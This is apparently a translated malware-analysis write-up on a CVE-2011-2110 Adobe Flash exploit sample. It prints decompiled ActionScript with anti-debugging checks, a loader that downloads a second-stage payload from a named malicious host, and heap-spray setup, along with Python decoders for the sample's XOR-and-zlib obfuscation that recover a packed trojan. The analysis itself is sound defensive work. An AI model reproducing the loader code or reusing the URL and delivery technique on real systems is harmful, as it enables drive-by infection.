CVE-2011-2110 Adobe Flash Player Array Out-of-Bounds Index Vulnerability

Lab environment

Windows 7
IDA
JPEXS Free Flash Decompiler
Adobe Flash Player 10.3.181.22

Sample analysis

Software download: http://fpdownload.macromedia.com/get/flashplayer/installers/archive/fp_10.3.181.22_archive.zip

If downloading from inside China I suggest using a VPN; the domestic download is proxied through 2144.com.

Working around the install restriction

Just edit the registry (if you are installing 10.3.xxx, the entries for version 10 also have to be deleted).

Opening the sample, we can see that it loads main.swf and passes it a parameter named info.

It is set depending on whether the browser is IE: the first case targets IE, while the second and third target non-IE browsers (note the ! negating the condition).

Let's decompile the SWF and search for info to see what is done with the info parameter.

This converts the info parameter from hex to binary, XORs every byte with 122, and finally calls uncompress.

```actionscript
var param:Object = root.loaderInfo.parameters;
// "info" arrives as a hex string; hexToBin turns it back into raw bytes
var t_url:ByteArray = this.hexToBin(param["info"]);
i = 0;
while(i < t_url.length)
{
    // single-byte XOR with key 122 (0x7a)
    t_url[i] = t_url[i] ^ 122;
    i++;
}
// after the XOR the buffer is a zlib stream holding the second-stage URL
t_url.uncompress();
```

The original author used Perl; we'll use Python.

```python
import binascii
import zlib

# hex-encoded "info" parameter lifted from the sample's HTML page
hex_string = "02e6b1525353caa8ad555555ad31b637b436aeb1b631b1ad35b355b5a93534ab51d3527b7ab7387656"
binary_string = binascii.unhexlify(hex_string)
# undo the single-byte XOR (key 122 / 0x7a) applied by the SWF
res = bytes(b ^ 122 for b in binary_string)
# what is left is a plain zlib stream; inflate it to recover the URL
print(zlib.decompress(res).decode())
```

The decoded result is the following. Naturally it can no longer be reached today, so we use the original author's copy.

http://www.amcia.info/down/cd.txt
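As an added example (not code from the original post), the decoder below generalises the snippet above: instead of assuming the key 122 it recovers the single-byte XOR key from the zlib header (the RFC 1950 CM=8 and mod-31 check) and confirms it by inflating. The INFO_HEX constant is the info value from the page; decode_stage() applies equally to the downloaded cd.txt.

```python
import binascii
import zlib
from typing import Optional, Tuple

# "info" parameter as embedded in the sample's HTML (value from the page above)
INFO_HEX = "02e6b1525353caa8ad555555ad31b637b436aeb1b631b1ad35b355b5a93534ab51d3527b7ab7387656"


def is_zlib_header(b0: int, b1: int) -> bool:
    """True if (b0, b1) is a valid zlib header: CM=8 (deflate) and the
    16-bit big-endian value is a multiple of 31 (the FCHECK rule)."""
    return (b0 & 0x0F) == 8 and ((b0 << 8) | b1) % 31 == 0


def recover_xor_key(blob: bytes) -> int:
    """Find the single-byte XOR key under which blob becomes a zlib stream
    that actually inflates. Raises ValueError if no key works."""
    for key in range(256):
        if not is_zlib_header(blob[0] ^ key, blob[1] ^ key):
            continue  # cheap header filter before attempting inflate
        try:
            zlib.decompress(bytes(b ^ key for b in blob))
        except zlib.error:
            continue  # header looked right but the stream did not inflate
        return key
    raise ValueError("no single-byte XOR key yields a valid zlib stream")


def decode_stage(blob: bytes, key: Optional[int] = None) -> bytes:
    """Undo XOR(key) + zlib; when key is None it is recovered from the data."""
    if key is None:
        key = recover_xor_key(blob)
    return zlib.decompress(bytes(b ^ key for b in blob))


def decode_info_param(hex_string: str) -> Tuple[int, str]:
    """Decode the hex-encoded 'info' parameter, returning (key, url)."""
    blob = binascii.unhexlify(hex_string)
    key = recover_xor_key(blob)
    return key, decode_stage(blob, key).decode("ascii")


if __name__ == "__main__":
    key, url = decode_info_param(INFO_HEX)
    print(f"xor key = {key} (0x{key:02x}), second-stage url = {url}")
```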

This file is encrypted.

```actionscript
// Environment checks: on anything other than MSIE/Firefox, on Chrome, or when a
// debugger, 64-bit process or Acrobat embedding is detected, error_arr.uncompress()
// is called on data that is not a valid zlib stream, so an exception aborts the flow.
if(!(browser.toLowerCase().indexOf("msie") > 0 || browser.toLowerCase().indexOf("firefox") > 0))
{
    error_arr.uncompress();
}
if(browser.toLowerCase().indexOf("chrome") > 0)
{
    error_arr.uncompress();
}
if(Capabilities.isDebugger || Capabilities.supports64BitProcesses || Capabilities.isEmbeddedInAcrobat)
{
    error_arr.uncompress();
}
var url_str:String = String(t_url);   // unused; the decoded URL is read from t_url below
loader = new URLLoader();
loader.dataFormat = URLLoaderDataFormat.BINARY;
loader.addEventListener(Event.COMPLETE,onLoadComplete);
// fetch the second stage (cd.txt) from the URL recovered from the info parameter
loader.load(new URLRequest(t_url.toString()));
```

An onLoadComplete handler is attached to the URLLoader's COMPLETE event.

```actionscript
onLoadComplete = function(param1:Event):void
{
    content = loader.data;
    i = 0;
    // same scheme as the info parameter: XOR every byte with 122, then inflate
    while(i < content.length)
    {
        content[i] = content[i] ^ 122;
        i++;
    }
    content.uncompress();
    content_len = content.length;
    var _loc2_:ByteArray = new ByteArray();
    code = _loc2_;
    // move the write cursor 1 MiB in, then write three 32-bit marker values
    _loc2_.position = 1024 * 1024;
    _loc2_.writeInt(2053274210);
    _loc2_.writeInt(2053339747);
    _loc2_.writeInt(2053405283);
    // serialise the ByteArray into itself (AMF) before calling test()
    _loc2_.writeObject(_loc2_);
    test();
    trace(_loc2_.length);
};
```

Python decryption

```python
import zlib

# cd.txt is the second stage fetched from the decoded URL
with open("./cd.txt", "rb") as fp:
    data = fp.read()
# same single-byte XOR (key 122) followed by zlib inflate
dec = bytes(b ^ 122 for b in data)
file = zlib.decompress(dec)
with open("decode.bin", "wb") as fp2:
    fp2.write(file)
```

The result is a packed PE executable.

Kingsoft Huoyan seems to have been taken offline, so let's look at Tencent Habo:

https://habo.qq.com/file/showdetail?pk=AD0GZ11tB2YIMVs5

And VirusTotal's report:

https://www.virustotal.com/#/file/021e3efdd7060cdbcbd066b5be3867de7b5ccc8ecbb8aa0cd2ad2971d9cc36f2/detection

It shows plenty of behaviours; the VirusTotal report also identifies it as a game-related trojan.

I had a quick look at the rest, but I'm being lazy...... so I'll leave it for now.

Setting up a local server to reproduce the vulnerability works well.

Turning the exploit into a PoC for debugging is also a useful step.

Also, when examining the patch, if the function is not matched by the diffing tool, you can search for the hex bytes of the vulnerable instruction instead.
